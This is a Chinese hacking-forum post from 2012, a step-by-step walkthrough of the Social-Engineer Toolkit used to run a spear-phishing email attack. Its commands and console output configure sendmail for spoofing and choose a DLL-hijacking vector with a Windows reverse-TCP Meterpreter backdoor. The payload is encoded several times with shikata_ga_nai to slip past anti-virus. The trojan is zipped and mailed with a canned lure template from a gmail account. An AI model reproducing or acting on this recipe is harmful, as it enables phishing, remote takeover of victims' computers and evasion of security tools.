切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
23 set: 配置邮箱欺骗[复制链接]
发表于 2012-8-6 17:12:10 | 显示全部楼层 |!read_mode!
编辑SET配置文件 吧:SENDMAIL=OFF 改为:SENDMAIL=ON
安装发射器:


  1. root@Dis9Team:/pen/set# apt-get install sendmail
复制代码
启动SET
  1. root@Dis9Team:/pen/set# ./set
复制代码

选择1 1) Social-Engineering Attacks

选择:1. Spear-Phishing Attack Vectors
3个选项:


  1. 1) Perform a Mass Email Attack
  2.    2) Create a FileFormat Payload
  3.    3) Create a Social-Engineering Template
复制代码
选择1 1) Perform a Mass Email Attack

然后选择漏洞利用的方式:

  1. 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
  2.    2) SET Custom Written Document UNC LM SMB Capture Attack
  3.    3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
  4.    4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
  5.    5) Adobe Flash Player "Button" Remote Code Execution
  6.    6) Adobe CoolType SING Table "uniqueName" Overflow
  7.    7) Adobe Flash Player "newfunction" Invalid Pointer Use
  8.    8) Adobe Collab.collectEmailInfo Buffer Overflow
  9.    9) Adobe Collab.getIcon Buffer Overflow
  10.   10) Adobe JBIG2Decode Memory Corruption Exploit
  11.   11) Adobe PDF Embedded EXE Social Engineering
  12.   12) Adobe util.printf() Buffer Overflow
  13.   13) Custom EXE to VBA (sent via RAR) (RAR required)
  14.   14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  15.   15) Adobe PDF Embedded EXE Social Engineering (NOJS)
  16.   16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  17.   17) Apple QuickTime PICT PnSize Buffer Overflow
  18.   18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  19.   19) Adobe Reader u3D Memory Corruption Vulnerability
复制代码
很多的是PDF阅读器的 我们选择DLL劫持的吧1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
回车后选择后门 选择:2) Windows Reverse_TCP Meterpreter
后门的编码免杀
  1. set:payloads>2

  2. Below is a list of encodings to try and bypass AV.

  3. Select one of the below, 'backdoored executable' is typically the best.

  4.    1) avoid_utf8_tolower (Normal)
  5.    2) shikata_ga_nai (Very Good)
  6.    3) alpha_mixed (Normal)
  7.    4) alpha_upper (Normal)
  8.    5) call4_dword_xor (Normal)
  9.    6) countdown (Normal)
  10.    7) fnstenv_mov (Normal)
  11.    8) jmp_call_additive (Normal)
  12.    9) nonalpha (Normal)
  13.   10) nonupper (Normal)
  14.   11) unicode_mixed (Normal)
  15.   12) unicode_upper (Normal)
  16.   13) alpha2 (Normal)
  17.   14) No Encoding (None)
  18.   15) Multi-Encoder (Excellent)
  19.   16) Backdoored Executable (BEST)

  20. set:encoding>
复制代码
选择 2
  1. set:encoding>2
  2. set:payloads> PORT of the listener [443]:9874
  3. [-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]

  4. [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

  5. [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

  6. [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

  7. [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
复制代码
接下来选择DLL劫持的扩展:
  1.   1. Windows Address Book (Universal)
  2.     2. Microsoft Help and Support Center
  3.     3. wscript.exe (XP)
  4.     4. Microsoft Office PowerPoint 2007
  5.     5. Microsoft Group Converter
  6.     6. Safari v5.0.1
  7.     7. Firefox <= 3.6.8
  8.     8. Microsoft PowerPoint 2010
  9.     9. Microsoft PowerPoint 2007
  10.     10. Microsoft Visio 2010
  11.     11. Microsoft Word 2007
  12.     12. Microsoft Powerpoint 2007
  13.     13. Microsoft Windows Media Encoder 9
  14.     14. Windows 7 and Vista Backup Utility
  15.     15. EnCase
  16.     16. IBM Rational License Key Administrator
  17.     17. Microsoft RDP
复制代码
选择3 3最多 3. wscript.exe (XP)

回车后:
输入木马名字
  1. set:webattack:dll_hijacking> Enter the filename for the attack (example:openthis) [openthis]:test

  2. Do you want to use a zipfile or rar file. Problem with zip
  3. is they will have to extract the files first, you can't just
  4. open the file from inside the zip. Rar does not have this
  5. restriction and is more reliable

  6. 1. Rar File
  7. 2. Zip File

  8. set:webattack:dll_hijacking> [rar]:2 #选择ZIP打包
  9. [-] This may take a few to load MSF...
  10. [-] Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.
  11. [-] Sendmail can take up to three minutes to start FYI.
  12. [*] Sendmail is set to ON
  13. set:phishing> Start Sendmail? [yes|no]:yes 启动邮件发送
  14. [-] NOTE: Sendmail can take 3-5 minutes to start.
  15. * Starting Mail Transport Agent (MTA) sendmail hostname: Name or service not known
  16. hostname: Name or service not known
  17. * MTA is already running.
  18. [-] As an added bonus, use the file-format creator in SET to create your attachment.

  19. Right now the attachment will be imported with filename of 'template.whatever'

  20. Do you want to rename the file?

  21. example Enter the new filename: moo.pdf

  22. 1. Keep the filename, I don't care. #选择默认
  23. 2. Rename the file, I want to be cool.

  24. set:phishing>1
  25. [*] Keeping the filename and moving on.

  26. Social Engineer Toolkit Mass E-Mailer

  27. There are two options on the mass e-mailer, the first would
  28. be to send an email to one individual person. The second option
  29. will allow you to import a list and send it to as many people as
  30. you want within that list.

  31. What do you want to do:

  32. 1. E-Mail Attack Single Email Address 邮件配置
  33. 2. E-Mail Attack Mass Mailer

  34. 99. Return to main menu.

  35. set:phishing>1

  36. Do you want to use a predefined template or craft
  37. a one time email template.

  38. 1. Pre-Defined Template 使用默认模板
  39. 2. One-Time Use Email Template

  40. set:phishing>1
  41. [-] Available templates:
  42. 1: Strange internet usage from your computer
  43. 2: Status Report
  44. 3: Have you seen this?
  45. 4: New Update
  46. 5: How long has it been?
  47. 6: Computer Issue
  48. 7: Baby Pics
  49. 8: hi brk
  50. 9: Dan Brown's Angels & Demons
  51. 10: WOAAAA!!!!!!!!!! This is crazy...
  52. set:phishing>2 选择内容 邮件的
  53. set:phishing> Send email to:blackrootkit@gmail.com 发送给谁

  54. 1. Use a gmail Account for your email attack. 使用自己的GMAIL
  55. 2. Use your own server or open relay

  56. set:phishing>1
  57. set:phishing> Your gmail email address:brkhacked@gmail.com #发送账户
  58. Email password: # 发送密码 看不见
  59. set:phishing> Flag this message/s as high priority? [yes|no]:yes
复制代码
然后就发送了 连木马一起发送了

视频稍后发送



附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-2 04:07

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部